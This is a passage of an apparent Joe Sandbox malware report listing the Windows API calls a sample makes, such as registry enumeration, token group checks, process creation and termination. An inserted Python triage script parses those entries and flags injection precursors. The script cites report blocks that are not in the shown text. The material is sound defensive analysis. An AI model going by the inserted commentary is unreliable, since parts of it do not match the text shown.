                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 4a110acf9b6eb2d77c80489a96a2e6091e39cfd5d4ea82e4c3909cbe46e5ff93
                                                    • Instruction ID: 999eb28b0f492b195a76c8f48173d781ff10a3871d15279d4ea569ca105166a3
                                                    • Opcode Fuzzy Hash: 4a110acf9b6eb2d77c80489a96a2e6091e39cfd5d4ea82e4c3909cbe46e5ff93
                                                    • Instruction Fuzzy Hash: 2FE09A70982705EBEB119F65EC0DB853AA7BB04742F11D135F102F11E0CBBA4604DA58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                    • Instruction ID: 5b48f42101f7ed3473684e012c2e6ccb5d9f8b9305390b0d65efb22d002ca623
                                                    • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                    • Instruction Fuzzy Hash: 9561AC7150065AABDF51EF60CC81EFE37A6AF05308F044918FC595B292EB389D4ACB69
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D02BD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D02FD
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006D0320
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006D0349
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006D038C
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D0399
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 1f3515f56b8192d846225330d5b54a8ef12a1c7635ca1c5318752553719a8019
                                                    • Instruction ID: eaf9192d78f89e8ae48cda16f995f59327449caf49506dcd9da33e539fd20cb3
                                                    • Opcode Fuzzy Hash: 1f3515f56b8192d846225330d5b54a8ef12a1c7635ca1c5318752553719a8019
                                                    • Instruction Fuzzy Hash: A1516A31508301AFD750EF64D895EAEBBEAFF85314F04491EF846872A2DB31E909CB56
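The API entries in these blocks are the raw material for triage: the sixth argument of the CreateProcessW call (dwCreationFlags, printed as 00000020, i.e. NORMAL_PRIORITY_CLASS, so that call is an ordinary spawn rather than a suspended-process injection precursor), the RegConnectRegistryW / RegOpenKeyExW / RegEnumValueW sequence (registry enumeration that RegConnectRegistryW can point at a remote machine), and the GetTokenInformation calls with information class 00000002 (TokenGroups, the SID walk an admin check performs). The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses entries in exactly the printed form (`• Name.MODULE(args), ref: addr`, with or without arguments, plus the `Part of subcall function` variant), decodes dwCreationFlags bit by bit, and emits one-line observations for the three patterns named above. One caveat it encodes: the IDA plugin reconstructs argument lists from the stack, so an entry can carry more or fewer values than the real prototype and `?` marks a value it could not recover; the decoder only trusts a position when it is present and numeric. The REPORT_LINES are copied from the CreateProcessW block above; CONSTRUCTED_LINE, with flags 08000004, is made up to exercise the CREATE_SUSPENDED path and does not occur in this report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

Arg = Union[int, str, None]   # None stands for the plugin's "?" (value not recovered)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Arg]
    ref: int                            # address of the call site ("ref:")
    subcall_of: Optional[int] = None    # set for "Part of subcall function XXXX:" entries


# One "APIs" entry as printed on the report page, e.g.
#   • CreateProcessW.KERNEL32(00000000,?,...,00000020,...), ref: 006DB682
#   • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # the plugin prints 8 hex digits, optionally signed


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX_ARG.match(tok):
        return int(tok, 16)            # "-00000001" becomes -1
    return tok                         # literal such as combase.dll or RoUninitialize


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None                    # headings, hashes, dump sources: not an API entry
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    sub = m.group("sub")
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def parse_api_block(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


# Documented CreateProcess dwCreationFlags bits, ascending; unknown bits are reported raw.
CREATION_FLAGS = [
    (0x00000001, "DEBUG_PROCESS"),
    (0x00000002, "DEBUG_ONLY_THIS_PROCESS"),
    (0x00000004, "CREATE_SUSPENDED"),
    (0x00000008, "DETACHED_PROCESS"),
    (0x00000010, "CREATE_NEW_CONSOLE"),
    (0x00000020, "NORMAL_PRIORITY_CLASS"),
    (0x00000040, "IDLE_PRIORITY_CLASS"),
    (0x00000080, "HIGH_PRIORITY_CLASS"),
    (0x00000200, "CREATE_NEW_PROCESS_GROUP"),
    (0x00000400, "CREATE_UNICODE_ENVIRONMENT"),
    (0x01000000, "CREATE_BREAKAWAY_FROM_JOB"),
    (0x08000000, "CREATE_NO_WINDOW"),
]


def decode_creation_flags(value: int) -> List[str]:
    names = [n for bit, n in CREATION_FLAGS if value & bit]
    leftover = value & ~sum(bit for bit, _ in CREATION_FLAGS)
    if leftover:
        names.append(f"0x{leftover:08X}")   # bits not covered by the table above
    return names


TOKEN_GROUPS = 2   # TOKEN_INFORMATION_CLASS value printed in the GetTokenInformation entries


def triage(calls: List[ApiCall]) -> List[str]:
    """Reduce parsed entries to the one-line observations a triager writes down."""
    notes = []
    for c in calls:
        if c.name == "CreateProcessW" and len(c.args) > 5 and isinstance(c.args[5], int):
            flags = decode_creation_flags(c.args[5])
            tag = "injection precursor" if "CREATE_SUSPENDED" in flags else "plain spawn"
            notes.append(f"{c.ref:08X}: CreateProcessW flags={'|'.join(flags) or '0'} ({tag})")
        elif c.name == "RegConnectRegistryW":
            notes.append(f"{c.ref:08X}: RegConnectRegistryW (can target a remote machine's registry)")
        elif c.name == "GetTokenInformation" and len(c.args) > 1 and c.args[1] == TOKEN_GROUPS:
            notes.append(f"{c.ref:08X}: GetTokenInformation(TokenGroups) (group/SID check, e.g. IsAdmin)")
    return notes


# Entries copied verbatim from the CreateProcessW block of this report.
REPORT_LINES = """\
• _memset.LIBCMT ref: 006DB644
• _memset.LIBCMT ref: 006DB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00716F20,00716F64), ref: 006DB682
• CloseHandle.KERNEL32 ref: 006DB694
"""
# Constructed entry (not in the report): same call with CREATE_SUSPENDED|CREATE_NO_WINDOW.
CONSTRUCTED_LINE = "• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 00000000"

if __name__ == "__main__":
    for note in triage(parse_api_block(REPORT_LINES + CONSTRUCTED_LINE)):
        print(note)
```

Running it on the report lines prints one "plain spawn" note for the call at 006DB682; the constructed entry produces the "injection precursor" note. To apply it to a whole report, feed every "APIs" block through parse_api_block and extend triage with the patterns you care about (the SendMessageW message IDs in the Msctls_Progress32 block, for instance, are all PBM_/CCM_ progress-bar messages and can be whitelisted the same way).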
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 006D57FB
                                                    • GetMenuItemCount.USER32(00000000), ref: 006D5832
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006D585A
                                                    • GetMenuItemID.USER32(?,?), ref: 006D58C9
                                                    • GetSubMenu.USER32(?,?), ref: 006D58D7
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 006D5928
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 43a9abc4788df6e3af2b0d5ce0d1bb2f3af933261d7a7d99e3f8036bc77b67d1
                                                    • Instruction ID: f92d77ee1804403942b47944079f5b7df8219cf650718c3ca1c0695cdb461a54
                                                    • Opcode Fuzzy Hash: 43a9abc4788df6e3af2b0d5ce0d1bb2f3af933261d7a7d99e3f8036bc77b67d1
                                                    • Instruction Fuzzy Hash: C1515E35E01625EFCF11EF64C855AEEB7B6EF48310F14446AE816BB351CB30AE419B94
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 006AEF06
                                                    • VariantClear.OLEAUT32(00000013), ref: 006AEF78
                                                    • VariantClear.OLEAUT32(00000000), ref: 006AEFD3
                                                    • _memmove.LIBCMT ref: 006AEFFD
                                                    • VariantClear.OLEAUT32(?), ref: 006AF04A
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006AF078
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 610f1ab06b5ff77b4faa504dc7332d67857bd1a604f9ce9688df08cd741042c5
                                                    • Instruction ID: 53b7dce9081149aa75d52188695eee83c1d2753eb25e4c79a35abecd12cb45f0
                                                    • Opcode Fuzzy Hash: 610f1ab06b5ff77b4faa504dc7332d67857bd1a604f9ce9688df08cd741042c5
                                                    • Instruction Fuzzy Hash: 355178B5A00209EFCB10DF58C890AAAB7F9FF4D310B15856AE949DB301E331E911CFA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2258
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B22A3
                                                    • IsMenu.USER32(00000000), ref: 006B22C3
                                                    • CreatePopupMenu.USER32 ref: 006B22F7
                                                    • GetMenuItemCount.USER32(000000FF), ref: 006B2355
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006B2386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 7ba29a9bc7c89a3182bb9cd861de1c47e66ccd1b73b8ad2e2b8800804a7129de
                                                    • Instruction ID: d0b82380aa4ed2aaefe954ccfeaab0a940e226a1bbbe0adda0edbb55cf935828
                                                    • Opcode Fuzzy Hash: 7ba29a9bc7c89a3182bb9cd861de1c47e66ccd1b73b8ad2e2b8800804a7129de
                                                    • Instruction Fuzzy Hash: 7251BEB0A0120BDBDF21CF68D8A8BEEBBF6BF45314F104129E811972A0D7748A85CB51
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0065179A
                                                    • GetWindowRect.USER32(?,?), ref: 006517FE
                                                    • ScreenToClient.USER32(?,?), ref: 0065181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0065182C
                                                    • EndPaint.USER32(?,?), ref: 00651876
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 3f57780646d85db3c56c7ea6fdec82a0cca7faa521e4a979648472eac1e5471d
                                                    • Instruction ID: 895a4d6cba0360138b06e9c6533bef0f6159c4ec70692eb6b772c7a9c380c067
                                                    • Opcode Fuzzy Hash: 3f57780646d85db3c56c7ea6fdec82a0cca7faa521e4a979648472eac1e5471d
                                                    • Instruction Fuzzy Hash: ED41C370500700EFD720DF28CC84FBA7BEAEB4A725F044669F9A58B2E1C7319849DB61
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006C4E41,?,?,00000000,00000001), ref: 006C70AC
                                                      • Part of subcall function 006C39A0: GetWindowRect.USER32(?,?), ref: 006C39B3
                                                    • GetDesktopWindow.USER32 ref: 006C70D6
                                                    • GetWindowRect.USER32(00000000), ref: 006C70DD
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006C710F
                                                      • Part of subcall function 006B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
                                                    • GetCursorPos.USER32(?), ref: 006C713B
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006C7199
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 03a4de96312b8960285b01848cfae8cd4840eeb440a4f6ab0a4038febfdf19fe
                                                    • Instruction ID: 80ef6221c0986206ee161cbb3e33365b9ef5310ab5e24560be31a8aa4a427ac6
                                                    • Opcode Fuzzy Hash: 03a4de96312b8960285b01848cfae8cd4840eeb440a4f6ab0a4038febfdf19fe
                                                    • Instruction Fuzzy Hash: 9331D272509305ABD720DF14D849FABB7EAFF88314F04091EF58597291CA30EA09CB92
                                                    APIs
                                                      • Part of subcall function 006A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006A80C0
                                                      • Part of subcall function 006A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006A80CA
                                                      • Part of subcall function 006A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006A80D9
                                                      • Part of subcall function 006A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006A80E0
                                                      • Part of subcall function 006A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006A80F6
                                                    • GetLengthSid.ADVAPI32(?,00000000,006A842F), ref: 006A88CA
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006A88D6
                                                    • HeapAlloc.KERNEL32(00000000), ref: 006A88DD
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 006A88F6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,006A842F), ref: 006A890A
                                                    • HeapFree.KERNEL32(00000000), ref: 006A8911
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 778146b4a193360201ff197156515d859ac7b041259ea8c3cecdf716bb2e8b8a
                                                    • Instruction ID: 5f11e3a5fcb07e88e359579eaf678e7b66c90ab467ef29d111beb71c04c9768c
                                                    • Opcode Fuzzy Hash: 778146b4a193360201ff197156515d859ac7b041259ea8c3cecdf716bb2e8b8a
                                                    • Instruction Fuzzy Hash: 5B117F71902209FFDB10AFA8DC09BBF777AEB46315F148169E84697210CB369E45DB60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006A85E2
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 006A85E9
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006A85F8
                                                    • CloseHandle.KERNEL32(00000004), ref: 006A8603
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006A8632
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 006A8646
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 4a856de2f7eeb5ff8a350e28cd9d2e18d11328696e23ee19f5470f0db0d4481a
                                                    • Instruction ID: 123b1d39662532105c283e5d4eaa762681f814f5d80e9e54b9ed0dd60ea60515
                                                    • Opcode Fuzzy Hash: 4a856de2f7eeb5ff8a350e28cd9d2e18d11328696e23ee19f5470f0db0d4481a
                                                    • Instruction Fuzzy Hash: 2C115C72901209AFDF01DFA4ED49FEE7BAAEF49304F045065FE05A2260C7719D61DB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 006AB7B5
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 006AB7C6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006AB7CD
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 006AB7D5
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 006AB7EC
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 006AB7FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: a9b39841ed43460b3c06f9205dfdaa0c0e593fa03b919660d1f11a6b536c23c3
                                                    • Instruction ID: 35d587813dc382ca54197078a5f88d64b1714c24ef8bcbd1911ed117d39202cf
                                                    • Opcode Fuzzy Hash: a9b39841ed43460b3c06f9205dfdaa0c0e593fa03b919660d1f11a6b536c23c3
                                                    • Instruction Fuzzy Hash: 96018475E01209BBEB10ABA69C45A5EBFB9EB49311F004076FA04A7291D671DD00CF90
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00670193
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0067019B
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006701A6
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006701B1
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 006701B9
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006701C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: d96844e4dcb564708030834919a6fe736a1e2b18513b15f147b9cd3d656fb381
                                                    • Instruction ID: fd2c2dc1c633868f413f8aa23eea9c5f78792c13d348880b57776b812f992860
                                                    • Opcode Fuzzy Hash: d96844e4dcb564708030834919a6fe736a1e2b18513b15f147b9cd3d656fb381
                                                    • Instruction Fuzzy Hash: 97016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006B53F9
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006B540F
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 006B541E
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B542D
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B5437
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006B543E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 68f3f1f55b0ba5d50a6c658edf55d5c771681bce7628858bb885307ec5e6b49a
                                                    • Instruction ID: 3f269445e64984ab9743707e1bb109d0c81219c25d55c89bc1d757d8a4503ccf
